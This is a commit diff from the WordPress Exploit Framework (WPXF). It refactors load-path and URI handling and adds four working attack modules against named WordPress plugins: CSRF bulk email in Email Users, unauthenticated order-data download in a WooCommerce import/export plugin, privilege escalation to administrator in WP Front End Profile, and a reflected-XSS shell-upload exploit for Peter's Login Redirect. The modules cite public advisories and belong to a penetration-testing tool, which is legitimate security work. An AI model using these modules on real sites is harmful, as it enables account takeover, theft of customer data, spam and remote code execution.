Merged development into master

Author: rastating

env.rb

@@ -1,11 +1,13 @@
 wpxfbase = __FILE__
+
 while File.symlink?(wpxfbase)
   wpxfbase = File.expand_path(File.readlink(wpxfbase), File.dirname(wpxfbase))
 end
 
 app_path = File.expand_path(File.join(File.dirname(wpxfbase)))
-$LOAD_PATH.unshift(app_path, 'lib')
-$LOAD_PATH.unshift(app_path, 'modules')
+
+$LOAD_PATH.unshift(File.join(app_path, 'lib'))
+$LOAD_PATH.unshift(File.join(app_path, 'modules'))
 
 require 'colorize'
 require 'date'
@@ -20,7 +22,7 @@
 require 'wpxf/utility/text'
 require 'wpxf/utility/reference_inflater'
 
-require 'github_updater'
+require_relative 'github_updater'
 
 module Wpxf
   def self.data_directory=(val)

lib/cli/console.rb

@@ -1,7 +1,6 @@
 require 'readline'
 
 require 'modules'
-require_all 'payloads'
 require 'cli/auto_complete'
 require 'cli/context'
 require 'cli/modules'

lib/wpxf/net/http_client.rb

@@ -1,3 +1,5 @@
+require 'uri'
+
 module Wpxf
   module Net
     # Provides HTTP client functionality.
@@ -62,13 +64,11 @@ def target_host
       # @param parts the URI parts to join and normalize.
       # @return [String] a normalized URI.
       def normalize_uri(*parts)
-        uri = parts * '/'
-        uri = uri.gsub(%r{(?<!:)//}, '/')
-        unless uri.start_with?('/') || uri.start_with?('http://') ||
-               uri.start_with?('https://')
-          uri = '/' + uri
-        end
-        uri
+        path = parts * '/'
+        path = '/' + path unless path.start_with?('/', 'http://', 'https://')
+        url = URI.parse(path)
+        url.path.squeeze!('/')
+        url.to_s
       end
 
       # Returns the base URI string.

lib/wpxf/wordpress/reflected_xss.rb

@@ -21,6 +21,8 @@ def run
     end
 
     return false unless super
+    return true if aux_module?
+
     emit_info 'Provide the URL below to the victim to begin the payload upload'
     puts
     puts url_with_xss

modules/auxiliary/email_users_csrf_bulk_mail.rb

@@ -0,0 +1,87 @@
+class Wpxf::Auxiliary::EmailUsersCsrfBulkMail < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Email Users <= 4.8.3 CSRF Bulk Mail',
+      desc: 'This module exploits a lack of CSRF protection in versions <= 4.8.3 of '\
+            'the Email Users plugin, which allows for the sending of a bulk e-mail to '\
+            'all users of a specified role.',
+      author: [
+        'Julien Rentrop',                  # Disclosure
+        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8601'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_vulnerability_in_email_users_wordpress_plugin.html']
+      ],
+      date: 'Aug 15 2016'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'user_role',
+        desc: 'The role of the users to send the e-mail to',
+        default: 'Subscriber',
+        required: true
+      ),
+      StringOption.new(
+        name: 'email_body',
+        desc: 'The HTML body of the e-mail to send',
+        required: true
+      ),
+      StringOption.new(
+        name: 'email_subject',
+        desc: 'The subject of the e-mail to send',
+        required: true
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('email-users', '4.8.4')
+  end
+
+  def user_role
+    "role-#{datastore['user_role'].downcase}"
+  end
+
+  def on_http_request(path, _params, _headers)
+    return '' unless path.eql? normalize_uri(xss_path, initial_req_path)
+    emit_info 'Serving CSRF script to victim...'
+    stop_http_server
+    { type: 'text/html', body: initial_script }
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php?page=mailusers-send-to-group-page')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'send' => 'true',
+      'fromName' => '',
+      'fromAddress' => '',
+      'group_mode' => 'role',
+      'mail_format' => 'html',
+      'send_targets[]' => user_role,
+      'subject' => datastore['email_subject'],
+      'mailcontent' => datastore['email_body']
+    )
+  end
+
+  def run
+    return false unless super
+
+    emit_info 'Provide the URL below to the victim to send the bulk e-mail'
+    puts
+    puts url_with_xss
+    puts
+
+    start_http_server
+    true
+  end
+end

modules/auxiliary/woocommerce_order_import_export_order_disclosure.rb

@@ -0,0 +1,65 @@
+class Wpxf::Auxiliary::WoocommerceOrderImportExportOrderDisclosure < Wpxf::Module
+  include Wpxf
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Order Import Export for WooCommerce <= 1.0.8 Order Information Disclosure',
+      desc: 'Version <= 1.0.8 of the import export plugin for WooCommerce allows unauthenticated '\
+            'users to download a CSV disclosing information about orders placed in the system.',
+      author: [
+        'David Peltier',                   # Disclosure
+        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8624'],
+        ['EDB', '40391']
+      ],
+      date: 'Sep 19 2016'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'export_path',
+        desc: 'The file to save the export to',
+        required: true
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('order-import-export-for-woocommerce', '1.0.9')
+  end
+
+  def export_path
+    normalized_option_value('export_path')
+  end
+
+  def export_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+
+  def run
+    return false unless super
+
+    emit_info 'Downloading order export CSV...'
+    res = download_file(
+      url: export_url,
+      method: :get,
+      params: {
+        'page' => 'wf_woocommerce_order_im_ex',
+        'action' => 'export'
+      },
+      local_filename: export_path
+    )
+
+    if res.code != 200
+      emit_error "Server responded with code #{res.code}"
+      return false
+    end
+
+    emit_success "Saved export to #{export_path}"
+    true
+  end
+end

modules/auxiliary/wp_front_end_profile_privilege_escalation.rb

@@ -0,0 +1,101 @@
+class Wpxf::Auxiliary::WpFrontEndProfilePrivilegeEscalation < Wpxf::Module
+  include Wpxf
+
+  def initialize
+    super
+
+    update_info(
+      name: 'WP Front End Profile <= 0.2.1 Privilege Escalation',
+      desc: 'The WP Front End Profile plugin, in versions <= 0.2.1, allows authenticated '\
+            'users of any user level to escalate their user role to an administrator.',
+      author: [
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8620']
+      ],
+      date: 'Sep 15 2016'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'username',
+        desc: 'The WordPress username to authenticate with',
+        required: true
+      ),
+      StringOption.new(
+        name: 'password',
+        desc: 'The WordPress password to authenticate with',
+        required: true
+      ),
+      StringOption.new(
+        name: 'profile_form_path',
+        desc: 'The path to the page containing the profile editor form',
+        required: true
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-front-end', '0.2.2')
+  end
+
+  def username
+    datastore['username']
+  end
+
+  def password
+    datastore['password']
+  end
+
+  def profile_form_url
+    normalize_uri(full_uri, datastore['profile_form_path'])
+  end
+
+  def fetch_profile_form(cookie)
+    res = nil
+
+    scoped_option_change('follow_http_redirection', true) do
+      res = execute_get_request(url: profile_form_url, cookie: cookie)
+    end
+
+    res
+  end
+
+  def form_fields_with_default_values(cookie)
+    res = fetch_profile_form(cookie)
+    return nil unless res && res.code == 200
+
+    fields = {}
+    res.body.scan(/<input.+?name="(.+?)".+?value="(.*?)".*?>/i) do |match|
+      if match[0].start_with?('wpfep_nonce_name', '_wp_http_referer', 'profile[')
+        emit_info "Found field #{match[0]}", true
+        fields[match[0]] = match[1]
+      end
+    end
+
+    fields
+  end
+
+  def run
+    return false unless super
+
+    cookie = authenticate_with_wordpress(username, password)
+    return false unless cookie
+
+    emit_info 'Requesting profile editor form...'
+    form_fields = form_fields_with_default_values(cookie)
+
+    if form_fields.nil?
+      emit_error 'Failed to retrieve the profile form'
+      return false
+    end
+
+    form_fields['profile[wp_user_level]'] = 10
+    form_fields['profile[wp_capabilities][administrator]'] = 1
+    form_fields['profile[wpfep_save]'] = 'Update Profile'
+
+    emit_info 'Elevating privileges...'
+    execute_post_request(url: profile_form_url, cookie: cookie, body: form_fields)
+  end
+end

modules/exploits/peters_login_redirect_reflected_xss_shell_upload.rb

@@ -0,0 +1,51 @@
+class Wpxf::Exploit::PetersLoginRedirectReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Peter\'s Login Redirect <= 2.9.0 Reflected XSS Shell Upload',
+      author: [
+        'Yorick Koster',                  # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8602'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_cross_site_request_forgery_in_peter_s_login_redirect_wordpress_plugin.html']
+      ],
+      date: 'Aug 15 2016'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'user_role',
+        desc: 'The user role to store the script against',
+        default: 'Administrator',
+        required: true
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_changelog('peters-login-redirect', 'readme.txt', '2.9.1')
+  end
+
+  def user_role
+    datastore['user_role'].downcase
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'options-general.php?page=wplogin_redirect.php')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'rul_role' => user_role,
+      'rul_role_address' => "\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>",
+      'rul_role_logout' => '',
+      'rul_role_submit' => 'Add role rule'
+    )
+  end
+end